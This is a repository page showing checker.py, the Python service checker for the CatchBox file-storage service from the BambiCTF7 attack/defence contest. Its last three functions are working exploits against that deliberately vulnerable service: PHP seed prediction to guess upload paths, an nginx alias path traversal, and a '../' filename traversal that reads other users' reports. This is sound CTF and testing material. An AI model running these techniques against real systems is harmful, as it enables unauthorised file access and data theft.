bambi7-service-catchbox

Simple Web-based file storage A/D service for BambiCTF7 in 2022
git clone https://git.sinitax.com/sinitax/bambi7-service-catchbox
Log | Files | Refs | README | sfeed.txt

checker.py (9604B)


      1from bs4 import BeautifulSoup
      2
      3from enochecker3 import (
      4    ChainDB,
      5    DependencyInjector,
      6    Enochecker,
      7    ExploitCheckerTaskMessage,
      8    GetflagCheckerTaskMessage,
      9    GetnoiseCheckerTaskMessage,
     10    InternalErrorException,
     11    MumbleException,
     12    PutflagCheckerTaskMessage,
     13    PutnoiseCheckerTaskMessage,
     14)
     15from enochecker3.utils import FlagSearcher, assert_in, assert_equals
     16
     17import dateutil.parser
     18
     19from httpx import AsyncClient, Response
     20
     21from hashlib import md5
     22
     23from logging import LoggerAdapter
     24
     25from subprocess import Popen, PIPE
     26
     27import string
     28
     29from typing import Any, Optional
     30
     31import random
     32
     33import os
     34
     35checker = Enochecker("CatchBox", 9090)
     36app = lambda: checker.app
     37
     38random.seed(int.from_bytes(os.urandom(16), "little"))
     39
     40noise_alph = string.ascii_letters + string.digits
     41def noise(nmin: int, nmax: int) -> str:
     42    n = random.randint(nmin, nmax)
     43    return "".join(random.choice(noise_alph) for _ in range(n))
     44
     45def filehash(user: str, file: str, seed: int) -> str:
     46    code = f"<?php srand({seed}); echo md5('{user}'.'{file}'.strval(rand())); ?>"
     47    with Popen("php", stdin=PIPE, stdout=PIPE) as php:
     48        return php.communicate(code.encode())[0].strip().decode()
     49
     50def str2epoch(text: str) -> int:
     51    date = dateutil.parser.parse(text + " UTC")
     52    return int(date.timestamp())
     53
     54def parse_html(logger: LoggerAdapter, r: Response) -> BeautifulSoup:
     55    try:
     56        return BeautifulSoup(r.text, "html.parser")
     57    except:
     58        logger.error(f"Invalid html from {r.request.method} {r.request.url.path}\n" \
     59            + r.text)
     60        raise MumbleException(f"Invalid html ({r.request.method} {r.request.url.path})")
     61
     62def assert_status_code(logger: LoggerAdapter, r: Response,
     63        code: int, errmsg: Optional[str], extra: Any = "") -> None:
     64    if r.status_code != code:
     65        logger.error(f"Bad service response for " \
     66            + f"{r.request.method} {r.request.url.path}:\n" \
     67            + f"Extra info: {str(extra)}\n{r.text}")
     68        if errmsg is None:
     69            errmsg = f"{r.request.method} {r.request.url.path} failed"
     70        raise MumbleException(errmsg)
     71
     72@checker.putflag(0)
     73async def putflag_file(task: PutflagCheckerTaskMessage, logger: LoggerAdapter,
     74        client: AsyncClient, db: ChainDB) -> str:
     75    username, password = noise(10, 20), noise(20, 30)
     76    data = { "action": "register", "username": username, "password": password }
     77    r = await client.post("/index.php", data=data)
     78    assert_status_code(logger, r, 200, "Register failed", extra=data)
     79
     80    filename, content = noise(20, 30), task.flag
     81    data = { "action": "upload", "filename": filename, "content": content }
     82    r = await client.post("/index.php", data=data)
     83    assert_status_code(logger, r, 200, "File upload", extra=data)
     84
     85    await db.set("info", (username, password, filename))
     86
     87    return f"User {username} File {filename}"
     88
     89@checker.getflag(0)
     90async def getflag_file(task: GetflagCheckerTaskMessage,
     91        logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> None:
     92    try:
     93        username, password, filename = await db.get("info")
     94    except KeyError:
     95        raise MumbleException("database info missing")
     96
     97    data = { "action": "login", "username": username, "password": password }
     98    r = await client.post("/index.php", data=data)
     99    assert_status_code(logger, r, 200, "Login failed", extra=data)
    100
    101    r = await client.get(f"/index.php?f={filename}")
    102    assert_status_code(logger, r, 200, "File download failed", extra=filename)
    103
    104    assert_in(task.flag, r.text, "Flag missing")
    105
    106@checker.putflag(1)
    107async def putflag_report(task: PutflagCheckerTaskMessage,
    108        logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> str:
    109    username, password = noise(10, 20), noise(20, 30)
    110    data = { "action": "register", "username": username, "password": password }
    111    r = await client.post("/index.php", data=data)
    112    assert_status_code(logger, r, 200, "Register failed", extra=data)
    113
    114    data = { "action": "report", "content": task.flag }
    115    r = await client.post("/index.php", data=data)
    116    assert_status_code(logger, r, 200, "Upload failed", extra=data)
    117
    118    await db.set("info", (username, password))
    119
    120    return f"User {username} Report"
    121
    122@checker.getflag(1)
    123async def getflag_report(task: GetflagCheckerTaskMessage,
    124        logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> None:
    125    try:
    126        username, password = await db.get("info")
    127    except KeyError:
    128        raise MumbleException("Database info missing")
    129
    130    data = { "action": "login", "username": username, "password": password }
    131    r = await client.post("/index.php", data=data)
    132    assert_status_code(logger, r, 200, "Login failed", extra=data)
    133
    134    r = await client.get(f"/index.php?r")
    135    assert_status_code(logger, r, 200, "Report download failed")
    136
    137    assert_in(task.flag, r.text, "Flag missing")
    138
    139@checker.putnoise(0)
    140async def putnoise_file(task: PutnoiseCheckerTaskMessage,
    141        logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> None:
    142    username, password = noise(10, 20), noise(20, 30)
    143    data = { "action": "register", "username": username, "password": password }
    144    r = await client.post("/index.php", data=data)
    145    assert_status_code(logger, r, 200, "Register failed", extra=data)
    146
    147    filename, content = noise(20, 30), noise(20, 30)
    148    data = { "action": "upload", "filename": filename, "content": content }
    149    r = await client.post("/index.php", data=data)
    150    assert_status_code(logger, r, 200, "File upload failed", extra=data)
    151
    152    await db.set("info", (username, password, filename, content))
    153
    154@checker.getnoise(0)
    155async def getnoise_file(task: GetnoiseCheckerTaskMessage,
    156        logger: LoggerAdapter, client: AsyncClient,
    157        db: ChainDB, di: DependencyInjector) -> None:
    158    try:
    159        username, password, filename, noise = await db.get("info")
    160    except KeyError:
    161        raise MumbleException("database info missing")
    162
    163    data = { "action": "login", "username": username, "password": password }
    164    r = await client.post("/index.php", data=data)
    165    assert_status_code(logger, r, 200, "Login failed", extra=data)
    166
    167    r = await client.get("/index.php?q=files")
    168    assert_status_code(logger, r, 200, "Files query failed")
    169
    170    soup = parse_html(logger, r)
    171    files = [v.select("a") for v in soup.select("ul.filelist > li")]
    172    assert_equals(all([len(v) == 2 for v in files]), True, "noise missing")
    173
    174    urls = { a.text.strip(): b.get("href", None) for a,b in files }
    175    assert_in(filename, urls, "Noise missing")
    176    assert_equals(type(urls[filename]), str, "noise missing")
    177
    178    r = await client.get(f"/index.php?f={filename}")
    179    assert_status_code(logger, r, 200, "File download failed", extra=filename)
    180    assert_in(noise, r.text, "Noise missing")
    181
    182    anon = await di.get(AsyncClient)
    183    r = await anon.get(urls[filename])
    184    assert_status_code(logger, r, 200, "Public url invalid",
    185        extra={"filename": filename, "url": urls[filename]})
    186    assert_in(noise, r.text, "Noise missing")
    187
    188@checker.exploit(0)
    189async def exploit_file_creat(task: ExploitCheckerTaskMessage,
    190        logger: LoggerAdapter, searcher: FlagSearcher,
    191        client: AsyncClient) -> Optional[str]:
    192    assert_equals(type(task.attack_info), str, "attack info missing")
    193
    194    assert_equals(len(task.attack_info.split()), 4)
    195    _, flaguser, _, flagfile = task.attack_info.split()
    196
    197    r = await client.get("/?q=users")
    198    assert_status_code(logger, r, 200, "Users listing failed")
    199
    200    soup = parse_html(logger, r)
    201    users = [v.children for v in soup.select("ul.userlist > li")]
    202    times = { a.text.strip(): str2epoch(b.text.strip()) for a,b in users }
    203
    204    assert_in(flaguser, times, "Flag user missing")
    205    for creat in range(times[flaguser], times[flaguser] + 15):
    206        dirname = filehash(flaguser, flagfile, creat)
    207        r = await client.get(f"/uploads/{dirname}/{flagfile}")
    208        if flag := searcher.search_flag(r.text):
    209            return flag
    210
    211@checker.exploit(1)
    212async def exploit_report_nginx(task: ExploitCheckerTaskMessage,
    213        logger: LoggerAdapter, searcher: FlagSearcher,
    214        client: AsyncClient) -> Optional[str]:
    215    assert_equals(type(task.attack_info), str, "attack info missing")
    216    assert_equals(len(task.attack_info.split()), 3, "attack info invalid")
    217
    218    _, flaguser, _ = task.attack_info.split()
    219    reportfile = md5(flaguser.encode()).hexdigest()
    220
    221    r = await client.get(f"/uploads../reports/{reportfile}")
    222    if flag := searcher.search_flag(r.text):
    223        return flag
    224
    225@checker.exploit(2)
    226async def exploit_report_path(task: ExploitCheckerTaskMessage,
    227        logger: LoggerAdapter, searcher: FlagSearcher,
    228        client: AsyncClient) -> Optional[str]:
    229    assert_equals(type(task.attack_info), str, "attack info missing")
    230    assert_equals(len(task.attack_info.split()), 3, "attack info invalid")
    231
    232    _, flaguser, _ = task.attack_info.split()
    233    reportfile = md5(flaguser.encode()).hexdigest()
    234
    235    username, password = noise(10, 20), noise(20, 30)
    236    data = { "action": "register", "username": username, "password": password }
    237    r = await client.post("/index.php", data=data)
    238    assert_status_code(logger, r, 200, "Register failed", extra=data)
    239
    240    filepath = f"../../reports/{reportfile}"
    241    data = { "action": "upload", "filename": filepath, "content": "exploit2!" }
    242    r = await client.post("/index.php", data=data)
    243    assert_status_code(logger, r, 200, "Path traversal", extra=data)
    244
    245    r = await client.get(f"/index.php?f={filepath}")
    246    if flag := searcher.search_flag(r.text):
    247        return flag
    248
# Run the checker when this file is executed directly as a script.
if __name__ == "__main__":
    checker.run()
    251